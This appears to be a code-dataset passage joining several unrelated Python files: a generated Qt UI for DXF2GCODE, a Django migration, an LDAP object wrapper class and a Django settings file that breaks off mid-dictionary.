sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startAtYLineEdit.sizePolicy().hasHeightForWidth())
self.startAtYLineEdit.setSizePolicy(sizePolicy)
self.startAtYLineEdit.setObjectName("startAtYLineEdit")
self.gridLayout.addWidget(self.startAtYLineEdit, 1, 1, 1, 1)
self.g1FeedXYLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.g1FeedXYLineEdit.sizePolicy().hasHeightForWidth())
self.g1FeedXYLineEdit.setSizePolicy(sizePolicy)
self.g1FeedXYLineEdit.setObjectName("g1FeedXYLineEdit")
self.gridLayout.addWidget(self.g1FeedXYLineEdit, 7, 1, 1, 1)
self.horizontalLayout_14 = QtWidgets.QHBoxLayout()
self.horizontalLayout_14.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_14.setSpacing(2)
self.horizontalLayout_14.setObjectName("horizontalLayout_14")
self.label_10 = QtWidgets.QLabel(self.millSettingsFrame)
self.label_10.setWordWrap(True)
self.label_10.setObjectName("label_10")
self.horizontalLayout_14.addWidget(self.label_10)
self.unitLabel_9 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_9.setText("[mm/min]")
self.unitLabel_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_9.setObjectName("unitLabel_9")
self.horizontalLayout_14.addWidget(self.unitLabel_9)
self.gridLayout.addLayout(self.horizontalLayout_14, 8, 0, 1, 1)
self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
self.horizontalLayout_7.setContentsMargins(0, -1, 0, -1)
self.horizontalLayout_7.setSpacing(2)
self.horizontalLayout_7.setObjectName("horizontalLayout_7")
self.startAtYLabel = QtWidgets.QLabel(self.millSettingsFrame)
self.startAtYLabel.setObjectName("startAtYLabel")
self.horizontalLayout_7.addWidget(self.startAtYLabel)
self.unitLabel_2 = QtWidgets.QLabel(self.millSettingsFrame)
self.unitLabel_2.setText("[mm]")
self.unitLabel_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.unitLabel_2.setObjectName("unitLabel_2")
self.horizontalLayout_7.addWidget(self.unitLabel_2)
self.gridLayout.addLayout(self.horizontalLayout_7, 1, 0, 1, 1)
self.startAtXLineEdit = QtWidgets.QLineEdit(self.millSettingsFrame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startAtXLineEdit.sizePolicy().hasHeightForWidth())
self.startAtXLineEdit.setSizePolicy(sizePolicy)
self.startAtXLineEdit.setObjectName("startAtXLineEdit")
self.gridLayout.addWidget(self.startAtXLineEdit, 0, 1, 1, 1)
self.verticalLayout_4.addLayout(self.gridLayout)
self.verticalLayout_5.addWidget(self.millSettingsFrame)
self.mytabWidget.addTab(self.tab_2, "")
self.canvas = Canvas(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(7)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.canvas.sizePolicy().hasHeightForWidth())
self.canvas.setSizePolicy(sizePolicy)
self.canvas.setMinimumSize(QtCore.QSize(200, 200))
self.canvas.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.canvas.setObjectName("canvas")
self.verticalLayout.addWidget(self.splitter)
self.messageBox = MessageBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.messageBox.sizePolicy().hasHeightForWidth())
self.messageBox.setSizePolicy(sizePolicy)
self.messageBox.setMaximumSize(QtCore.QSize(16777215, 100))
self.messageBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.messageBox.setObjectName("messageBox")
self.verticalLayout.addWidget(self.messageBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuExport = QtWidgets.QMenu(self.menubar)
self.menuExport.setEnabled(True)
self.menuExport.setObjectName("menuExport")
self.menuView = QtWidgets.QMenu(self.menubar)
self.menuView.setObjectName("menuView")
self.menuTolerances = QtWidgets.QMenu(self.menubar)
self.menuTolerances.setObjectName("menuTolerances")
self.menuMachine_Type = QtWidgets.QMenu(self.menuTolerances)
self.menuMachine_Type.setObjectName("menuMachine_Type")
self.menuHelp = QtWidgets.QMenu(self.menubar)
self.menuHelp.setObjectName("menuHelp")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtWidgets.QAction(MainWindow)
self.actionOpen.setObjectName("actionOpen")
self.actionClose = QtWidgets.QAction(MainWindow)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/images/delete.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.actionClose.setIcon(icon5)
self.actionClose.setObjectName("actionClose")
self.actionShowPathDirections = QtWidgets.QAction(MainWindow)
self.actionShowPathDirections.setCheckable(True)
self.actionShowPathDirections.setChecked(False)
self.actionShowPathDirections.setEnabled(False)
self.actionShowPathDirections.setObjectName("actionShowPathDirections")
self.actionShowDisabledPaths = QtWidgets.QAction(MainWindow)
self.actionShowDisabledPaths.setCheckable(True)
self.actionShowDisabledPaths.setChecked(False)
self.actionShowDisabledPaths.setEnabled(False)
self.actionShowDisabledPaths.setObjectName("actionShowDisabledPaths")
self.actionAutoscale = QtWidgets.QAction(MainWindow)
self.actionAutoscale.setEnabled(False)
self.actionAutoscale.setObjectName("actionAutoscale")
self.actionDeleteG0Paths = QtWidgets.QAction(MainWindow)
self.actionDeleteG0Paths.setEnabled(False)
self.actionDeleteG0Paths.setObjectName("actionDeleteG0Paths")
self.actionConfiguration = QtWidgets.QAction(MainWindow)
self.actionConfiguration.setObjectName("actionConfiguration")
self.actionConfigurationPostprocessor = QtWidgets.QAction(MainWindow)
self.actionConfigurationPostprocessor.setObjectName("actionConfigurationPostprocessor")
self.actionTolerances = QtWidgets.QAction(MainWindow)
self.actionTolerances.setObjectName("actionTolerances")
self.actionScaleAll = QtWidgets.QAction(MainWindow)
self.actionScaleAll.setEnabled(False)
self.actionScaleAll.setObjectName("actionScaleAll")
self.actionRotateAll = QtWidgets.QAction(MainWindow)
self.actionRotateAll.setEnabled(False)
self.actionRotateAll.setObjectName("actionRotateAll")
self.actionMoveWorkpieceZero = QtWidgets.QAction(MainWindow)
self.actionMoveWorkpieceZero.setEnabled(False)
self.actionMoveWorkpieceZero.setObjectName("actionMoveWorkpieceZero")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionOptimizePaths = QtWidgets.QAction(MainWindow)
self.actionOptimizePaths.setEnabled(False)
self.actionOptimizePaths.setObjectName("actionOptimizePaths")
self.actionExportShapes = QtWidgets.QAction(MainWindow)
self.actionExportShapes.setEnabled(False)
self.actionExportShapes.setObjectName("actionExportShapes")
self.actionOptimizeAndExportShapes = QtWidgets.QAction(MainWindow)
self.actionOptimizeAndExportShapes.setEnabled(False)
self.actionOptimizeAndExportShapes.setObjectName("actionOptimizeAndExportShapes")
self.actionLiveUpdateExportRoute = QtWidgets.QAction(MainWindow)
self.actionLiveUpdateExportRoute.setCheckable(True)
self.actionLiveUpdateExportRoute.setEnabled(False)
self.actionLiveUpdateExportRoute.setObjectName("actionLiveUpdateExportRoute")
self.actionReload = QtWidgets.QAction(MainWindow)
self.actionReload.setEnabled(False)
self.actionReload.setObjectName("actionReload")
self.actionSplitLineSegments = QtWidgets.QAction(MainWindow)
self.actionSplitLineSegments.setCheckable(True)
self.actionSplitLineSegments.setObjectName("actionSplitLineSegments")
self.actionAutomaticCutterCompensation = QtWidgets.QAction(MainWindow)
self.actionAutomaticCutterCompensation.setCheckable(True)
self.actionAutomaticCutterCompensation.setEnabled(False)
self.actionAutomaticCutterCompensation.setObjectName("actionAutomaticCutterCompensation")
self.actionMilling = QtWidgets.QAction(MainWindow)
self.actionMilling.setCheckable(True)
self.actionMilling.setObjectName("actionMilling")
self.actionDragKnife = QtWidgets.QAction(MainWindow)
self.actionDragKnife.setCheckable(True)
self.actionDragKnife.setObjectName("actionDragKnife")
self.actionLathe = QtWidgets.QAction(MainWindow)
self.actionLathe.setCheckable(True)
self.actionLathe.setObjectName("actionLathe")
self.actionTopView = QtWidgets.QAction(MainWindow)
self.actionTopView.setEnabled(False)
self.actionTopView.setObjectName("actionTopView")
self.actionIsometricView = QtWidgets.QAction(MainWindow)
self.actionIsometricView.setEnabled(False)
self.actionIsometricView.setObjectName("actionIsometricView")
self.actionSaveProjectAs = QtWidgets.QAction(MainWindow)
self.actionSaveProjectAs.setEnabled(False)
self.actionSaveProjectAs.setObjectName("actionSaveProjectAs")
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionReload)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionSaveProjectAs)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionClose)
self.menuExport.addAction(self.actionOptimizePaths)
self.menuExport.addAction(self.actionExportShapes)
self.menuExport.addAction(self.actionOptimizeAndExportShapes)
self.menuView.addAction(self.actionShowPathDirections)
self.menuView.addAction(self.actionShowDisabledPaths)
self.menuView.addSeparator()
self.menuView.addAction(self.actionLiveUpdateExportRoute)
self.menuView.addAction(self.actionDeleteG0Paths)
self.menuView.addSeparator()
self.menuView.addAction(self.actionAutoscale)
self.menuView.addAction(self.actionTopView)
self.menuView.addAction(self.actionIsometricView)
self.menuMachine_Type.addAction(self.actionMilling)
self.menuMachine_Type.addAction(self.actionLathe)
self.menuMachine_Type.addAction(self.actionDragKnife)
self.menuTolerances.addAction(self.actionConfiguration)
self.menuTolerances.addAction(self.actionConfigurationPostprocessor)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionTolerances)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionScaleAll)
self.menuTolerances.addAction(self.actionRotateAll)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionMoveWorkpieceZero)
self.menuTolerances.addSeparator()
self.menuTolerances.addAction(self.actionSplitLineSegments)
self.menuTolerances.addAction(self.actionAutomaticCutterCompensation)
self.menuTolerances.addAction(self.menuMachine_Type.menuAction())
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuExport.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuTolerances.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
self.mytabWidget.setCurrentIndex(0)
self.layersCollapsePushButton.clicked.connect(self.layersShapesTreeView.collapseAll)
self.layersExpandPushButton.clicked.connect(self.layersShapesTreeView.expandAll)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
MainWindow.setTabOrder(self.mytabWidget, self.entitiesTreeView)
MainWindow.setTabOrder(self.entitiesTreeView, self.blocksCollapsePushButton)
MainWindow.setTabOrder(self.blocksCollapsePushButton, self.blocksExpandPushButton)
MainWindow.setTabOrder(self.blocksExpandPushButton, self.canvas)
MainWindow.setTabOrder(self.canvas, self.messageBox)
MainWindow.setTabOrder(self.messageBox, self.layersShapesTreeView)
MainWindow.setTabOrder(self.layersShapesTreeView, self.layersCollapsePushButton)
MainWindow.setTabOrder(self.layersCollapsePushButton, self.layersExpandPushButton)
MainWindow.setTabOrder(self.layersExpandPushButton, self.layersGoUpPushButton)
MainWindow.setTabOrder(self.layersGoUpPushButton, self.layersGoDownPushButton)
MainWindow.setTabOrder(self.layersGoDownPushButton, self.toolDiameterComboBox)
MainWindow.setTabOrder(self.toolDiameterComboBox, self.startAtXLineEdit)
MainWindow.setTabOrder(self.startAtXLineEdit, self.startAtYLineEdit)
MainWindow.setTabOrder(self.startAtYLineEdit, self.zRetractionArealLineEdit)
MainWindow.setTabOrder(self.zRetractionArealLineEdit, self.zSafetyMarginLineEdit)
MainWindow.setTabOrder(self.zSafetyMarginLineEdit, self.zInitialMillDepthLineEdit)
MainWindow.setTabOrder(self.zInitialMillDepthLineEdit, self.zInfeedDepthLineEdit)
MainWindow.setTabOrder(self.zInfeedDepthLineEdit, self.zFinalMillDepthLineEdit)
MainWindow.setTabOrder(self.zFinalMillDepthLineEdit, self.g1FeedXYLineEdit)
MainWindow.setTabOrder(self.g1FeedXYLineEdit, self.g1FeedZLineEdit)
def retranslateUi(self, MainWindow):
    """(Re)apply every user-visible string of the main window.

    Called from setupUi after the widgets are built; appears to be
    pyuic5-generated from a Qt Designer .ui file, so hand edits here
    would be lost on regeneration. All strings go through
    QCoreApplication.translate so Qt translators can localize them.
    """
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "DXF2GCODE"))
    # --- Entities tab ---
    self.blocksCollapsePushButton.setToolTip(_translate("MainWindow", "Collapse all items"))
    self.blocksExpandPushButton.setToolTip(_translate("MainWindow", "Expand all items"))
    self.mytabWidget.setTabText(self.mytabWidget.indexOf(self.tab), _translate("MainWindow", "Entities"))
    # --- Layers tab: tree controls ---
    self.layersCollapsePushButton.setToolTip(_translate("MainWindow", "Collapse all items"))
    self.layersExpandPushButton.setToolTip(_translate("MainWindow", "Expand all items"))
    self.layersGoUpPushButton.setToolTip(_translate("MainWindow", "Move-up the selected shape/layer"))
    self.layersGoDownPushButton.setToolTip(_translate("MainWindow", "Move-down the selected shape/layer"))
    # --- Mill settings labels (unit suffix labels keep their literal "[mm]" text) ---
    self.label_11.setText(_translate("MainWindow", "⌀"))
    self.label_12.setText(_translate("MainWindow", "/ speed "))
    self.label_13.setText(_translate("MainWindow", "start rad. (comp) "))
    self.zInitialMillDepthLineEdit.setToolTip(_translate("MainWindow", "Milling will start at Z = \"Workpiece top Z\" - \"Z infeed depth\""))
    self.label_7.setText(_translate("MainWindow", "Feed rate XY"))
    self.label_8.setText(_translate("MainWindow", "Z Final mill depth"))
    self.label_9.setText(_translate("MainWindow", "Z Infeed depth"))
    self.label_5.setText(_translate("MainWindow", "Z Safety margin"))
    self.label_6.setText(_translate("MainWindow", "Z Retraction area"))
    self.label_14.setText(_translate("MainWindow", "Z Workpiece top"))
    self.startAtXLabel.setText(_translate("MainWindow", "Start X"))
    self.label_10.setText(_translate("MainWindow", "Feed rate Z"))
    self.startAtYLabel.setText(_translate("MainWindow", "Start Y"))
    self.mytabWidget.setTabText(self.mytabWidget.indexOf(self.tab_2), _translate("MainWindow", "Layers"))
    # --- Menu bar titles ---
    self.menuFile.setTitle(_translate("MainWindow", "File"))
    self.menuExport.setStatusTip(_translate("MainWindow", "Export the current project to G-Code"))
    self.menuExport.setTitle(_translate("MainWindow", "Export"))
    self.menuView.setTitle(_translate("MainWindow", "View"))
    self.menuTolerances.setTitle(_translate("MainWindow", "Options"))
    self.menuMachine_Type.setTitle(_translate("MainWindow", "Machine Type"))
    self.menuHelp.setTitle(_translate("MainWindow", "Help"))
    # --- Actions: captions, status tips and keyboard shortcuts ---
    self.actionOpen.setText(_translate("MainWindow", "Open..."))
    self.actionOpen.setStatusTip(_translate("MainWindow", "Load DXF or other supported document"))
    self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+O"))
    self.actionClose.setText(_translate("MainWindow", "Exit"))
    self.actionClose.setStatusTip(_translate("MainWindow", "Exit DXF2GCODE and close window"))
    self.actionClose.setShortcut(_translate("MainWindow", "Ctrl+Q"))
    self.actionShowPathDirections.setText(_translate("MainWindow", "Show Path Directions"))
    self.actionShowPathDirections.setStatusTip(_translate("MainWindow", "Always shows the path direction in the plot (not only while selected)"))
    self.actionShowDisabledPaths.setText(_translate("MainWindow", "Show Disabled Paths"))
    self.actionAutoscale.setText(_translate("MainWindow", "Autoscale"))
    self.actionAutoscale.setShortcut(_translate("MainWindow", "Ctrl+V, A"))
    self.actionDeleteG0Paths.setText(_translate("MainWindow", "Delete G0 Paths"))
    self.actionConfiguration.setText(_translate("MainWindow", "Configuration..."))
    self.actionConfiguration.setShortcut(_translate("MainWindow", "Ctrl+Shift+C"))
    self.actionConfigurationPostprocessor.setText(_translate("MainWindow", "Postprocessor configuration..."))
    self.actionConfigurationPostprocessor.setShortcut(_translate("MainWindow", "Ctrl+Shift+P"))
    self.actionTolerances.setText(_translate("MainWindow", "Tolerances"))
    self.actionScaleAll.setText(_translate("MainWindow", "Scale All"))
    self.actionRotateAll.setText(_translate("MainWindow", "Rotate All"))
    self.actionMoveWorkpieceZero.setText(_translate("MainWindow", "Move Workpiece Zero"))
    self.actionAbout.setText(_translate("MainWindow", "About"))
    self.actionOptimizePaths.setText(_translate("MainWindow", "Optimize Paths"))
    self.actionOptimizePaths.setShortcut(_translate("MainWindow", "Ctrl+Shift+O"))
    self.actionExportShapes.setText(_translate("MainWindow", "Export Shapes"))
    self.actionExportShapes.setShortcut(_translate("MainWindow", "Ctrl+Shift+E"))
    self.actionOptimizeAndExportShapes.setText(_translate("MainWindow", "Optimize and Export Shapes"))
    self.actionOptimizeAndExportShapes.setShortcut(_translate("MainWindow", "Ctrl+E"))
    self.actionLiveUpdateExportRoute.setText(_translate("MainWindow", "Live Update Export Route"))
    self.actionReload.setText(_translate("MainWindow", "Reload"))
    self.actionReload.setShortcut(_translate("MainWindow", "Ctrl+R"))
    self.actionSplitLineSegments.setText(_translate("MainWindow", "Split Line Segments"))
    self.actionSplitLineSegments.setStatusTip(_translate("MainWindow", "Split line segments, e.g. can be used for compensation (G41/G42) in combination with EMC"))
    self.actionAutomaticCutterCompensation.setText(_translate("MainWindow", "Automatic Cutter Compensation"))
    self.actionMilling.setText(_translate("MainWindow", "Milling"))
    self.actionDragKnife.setText(_translate("MainWindow", "Drag Knife"))
    self.actionLathe.setText(_translate("MainWindow", "Lathe"))
    self.actionTopView.setText(_translate("MainWindow", "Top View"))
    self.actionTopView.setShortcut(_translate("MainWindow", "Ctrl+V, T"))
    self.actionIsometricView.setText(_translate("MainWindow", "Isometric View"))
    self.actionIsometricView.setShortcut(_translate("MainWindow", "Ctrl+V, I"))
    self.actionSaveProjectAs.setText(_translate("MainWindow", "Save Project As..."))
    self.actionSaveProjectAs.setShortcut(_translate("MainWindow", "Ctrl+S"))
from gui.canvas import Canvas
from gui.messagebox import MessageBox
from gui.treeview import TreeView
import dxf2gcode_images5_rc
| hehongyu1995/Dxf2GCode | dxf2gcode_ui5.py | Python | gpl-3.0 | 45,029 |
# Generated by Django 2.2.7 on 2020-02-07 20:00
from django.db import migrations
class Migration(migrations.Migration):
    """Make UnitOfMeasurement records order by their symbol by default."""

    dependencies = [("enhydris", "0030_abolish_instruments")]

    operations = [
        migrations.AlterModelOptions(
            name="unitofmeasurement",
            options={"ordering": ["symbol"]},
        ),
    ]
| openmeteo/enhydris | enhydris/migrations/0031_change_unitofmeasurement_meta.py | Python | agpl-3.0 | 347 |
import ldap
import ldif
from ldap.cidict import cidict
from io import StringIO
from uuid import UUID
class CustomCidict(cidict):
    """Case-insensitive dict that yields an empty list for missing keys
    instead of raising a KeyError."""

    def __getitem__(self, key):
        # cidict keeps its backing ``data`` dict keyed by lower-cased
        # names; fall back to [] when the attribute is absent.
        return self.data.get(key.lower(), [])
class LdapprObject(object):
    """\
    The LdapprObject is used to handle search results from the Connection
    class. It's a representation of a single object in the LDAP Directory.
    """
    # String form of the objectGUID attribute when present (e.g. Active
    # Directory objects); stays None otherwise.
    guid = None

    def __init__(self, result, conn):
        """The class is initialized with a tuple: (dn, {attributes}), and the
        existing connection

        :param result: (dn, attributes) tuple as returned by a search
        :param conn: live LDAP connection used by the mutator methods
        """
        (self.dn, self.attributes) = result
        self.attrs = CustomCidict(self.attributes)
        if any(key.lower() == 'objectguid' for key in self.attrs.keys()):
            self.guid = str(UUID(bytes=self.attrs['objectguid'][0]))
        self.conn = conn

    def __str__(self):
        """Pretty prints all attributes with values."""
        # default=2 (len('dn')) keeps formatting valid even when the
        # object has no attributes at all (max() would otherwise raise).
        col_width = max((len(key) for key in self.attrs.keys()), default=2)
        pretty_string = '{attr:{width}} : {value}\n'.format(
            attr='dn', width=col_width, value=self.dn)
        for key, value in self.attrs.items():
            if value and len(str(value[0])) > 80:  # hack to 'detect' binary attrs
                value = ['binary']
            for single_value in value:
                pretty_string += '{attr:{width}} : {value}\n'.format(
                    attr=self._case(key), width=col_width, value=single_value)
                key = ''  # print the attribute name only on its first line
        return pretty_string

    def _case(self, attr):
        """Transforms an attribute to correct case (e.g. gIvEnNaMe becomes
        givenName). If attr is unknown nothing is transformed.

        :param attr: may be incorrectly cased
        :return: attr in proper case
        """
        try:
            keys = list(self.attrs.keys())
            index = [x.lower() for x in keys].index(attr.lower())
            return keys[index]
        except ValueError:
            # attr is not among this object's attributes; return unchanged
            return attr

    def to_ldif(self):
        """Makes LDIF of ldappr object.

        :return: LDIF text for this object's dn and attributes
        """
        out = StringIO()
        ldif_out = ldif.LDIFWriter(out)
        ldif_out.unparse(self.dn, self.attributes)
        return out.getvalue()

    def set_value(self, attr, value):
        """Replace all values of *attr* with the single *value* (MOD_REPLACE),
        both on the server and in the local cache."""
        attr = self._case(attr)
        self.conn.modify_s(self.dn, [(ldap.MOD_REPLACE, attr, value)])
        self.attrs[attr] = [value]

    def add_value(self, attr, value):
        """Add *value* to *attr* (MOD_ADD) on the server and locally."""
        attr = self._case(attr)
        self.conn.modify_s(self.dn, [(ldap.MOD_ADD, attr, value)])
        self.attrs[attr].append(value)

    def remove_value(self, attr, value):
        """Remove *value* from *attr* (MOD_DELETE) on the server and locally."""
        attr = self._case(attr)
        self.conn.modify_s(self.dn, [(ldap.MOD_DELETE, attr, value)])
        if value in self.attrs[attr]:
            self.attrs[attr].remove(value)
| nanu2/ldappr | ldappr/ldapprobject.py | Python | isc | 2,946 |
"""
Django settings for cloudmesh_portal project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
from django.contrib.messages import constants as message_constants
SITE_ID = 1  # django.contrib.sites: id of the Site record this deployment uses

# BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))

# Include BOOTSTRAP3_FOLDER in path
# (makes a sibling 'bootstrap3' checkout importable -- TODO confirm the
# relative location '../bootstrap3' matches the deployment layout)
BOOTSTRAP3_FOLDER = os.path.abspath(os.path.join(BASE_DIR, '..', 'bootstrap3'))
if BOOTSTRAP3_FOLDER not in sys.path:
    sys.path.insert(0, BOOTSTRAP3_FOLDER)

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gw=857%2gacc+b08kvygbsmvt+#(o51nw@40t2uk3xei2@qzzk'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# NOTE(review): this empty value is overridden by a second ALLOWED_HOSTS
# assignment further down in this file, so the assignment here is dead.
ALLOWED_HOSTS = []

# Application definition

# Map Django message levels to Bootstrap alert CSS class names
# (ERROR intentionally maps to Bootstrap's 'danger').
MESSAGE_TAGS = {message_constants.DEBUG: 'debug',
                message_constants.INFO: 'info',
                message_constants.SUCCESS: 'success',
                message_constants.WARNING: 'warning',
                message_constants.ERROR: 'danger',}
INSTALLED_APPS = (
    # 'django_admin_bootstrapped.bootstrap3',
    'django_admin_bootstrapped',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.sites',
    'django.contrib.flatpages',
    'rest_framework',
    'rest_framework_swagger',
)

# Additional template/UI apps; commented alternatives kept for reference.
# INSTALLED_APPS += ('bootstrap3',)
# INSTALLED_APPS += ('bootstrap_themes',)
INSTALLED_APPS += ('django_jinja',)
# INSTALLED_APPS += ('bootstrapform_jinja',)
INSTALLED_APPS += ('django_jinja.contrib._humanize',)

# Django 1.8-style middleware setting (this name was replaced by
# MIDDLEWARE in Django 1.10); order matters -- sessions before auth,
# flatpage fallback last.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
)
ROOT_URLCONF = 'cloudmesh_portal.urls'

# Two template engines are configured: django_jinja handles files with the
# ".jinja" extension, everything else falls through to the stock backend.
# os.path.join(BASE_DIR, 'templates'),
TEMPLATES = [
    {
        "BACKEND": "django_jinja.backend.Jinja2",
        'DIRS': [os.path.join(BASE_DIR, 'cloudmesh_portal', 'templates')],
        "APP_DIRS": True,
        "OPTIONS": {
            "match_extension": ".jinja",
            "environment":"cloudmesh_portal.jinjaconfig.environment",
        }
    },
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'cloudmesh_portal', 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'cloudmesh_portal.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Development database: a SQLite file inside the project directory.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
# noinspection PyRedeclaration
ALLOWED_HOSTS = ['localhost', '127.0.0.1', ]
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/

STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static"),
    # NOTE(review): '/static/' is an absolute filesystem directory here,
    # not a URL -- confirm this entry is intentional.
    '/static/',
)

# NOTE(review): STATIC_URL normally holds a URL prefix such as '/static/';
# here it is set to a filesystem path -- verify this is intentional.
STATIC_URL = os.path.join(BASE_DIR, "static/")

# Bootswatch theme name interpolated into the css_url below.
cm_theme = 'cosmo'

# Default settings
BOOTSTRAP3 = {

    # The URL to the jQuery JavaScript file
    'jquery_url': '//code.jquery.com/jquery.min.js',

    # The Bootstrap base URL
    'base_url': '//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/',

    # The complete URL to the Bootstrap CSS file (None means derive it
    # from base_url)
    # 'css_url': None,
    'css_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/' +
               cm_theme + '/bootstrap.min.css',

    # The complete URL to the Bootstrap CSS file (None means no theme)
    'theme_url': None,
    # 'theme_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/flatly
    # /bootstrap.min.css',
    # 'theme_url': 'https://maxcdn.bootstrapcdn.com/bootswatch/3.3.5/flatly/',

    # The complete URL to the Bootstrap JavaScript file (None means
    # derive it from base_url)
    'javascript_url': None,

    # Put JavaScript in the HEAD section of the HTML document (only relevant
    # if you use bootstrap3.html)
    'javascript_in_head': True,

    # Include jQuery with Bootstrap JavaScript (affects django-bootstrap3
    # template tags)
    'include_jquery': True,

    # Label class to use in horizontal forms
    'horizontal_label_class': 'col-md-3',

    # Field class to use in horizontal forms
    'horizontal_field_class': 'col-md-9',

    # Set HTML required attribute on required fields
    'set_required': True,

    # Set HTML disabled attribute on disabled fields
    'set_disabled': False,

    # Set placeholder attributes to label if no placeholder is provided
    'set_placeholder': True,

    # Class to indicate required (better to set this in your Django form)
    'required_css_class': '',

    # Class to indicate error (better to set this in your Django form)
    'error_css_class': 'has-error',

    # Class to indicate success, meaning the field has valid input
    # (better to set this in your Django form)
    'success_css_class': 'has-success',

    # Renderers (only set these if you have studied the source and
    # understand the inner workings)
    'formset_renderers': {
        'default': 'bootstrap3.renderers.FormsetRenderer',
    },
    'form_renderers': {
        'default': 'bootstrap3.renderers.FormRenderer',
    },
    'field_renderers': {
        'default': 'bootstrap3.renderers.FieldRenderer',
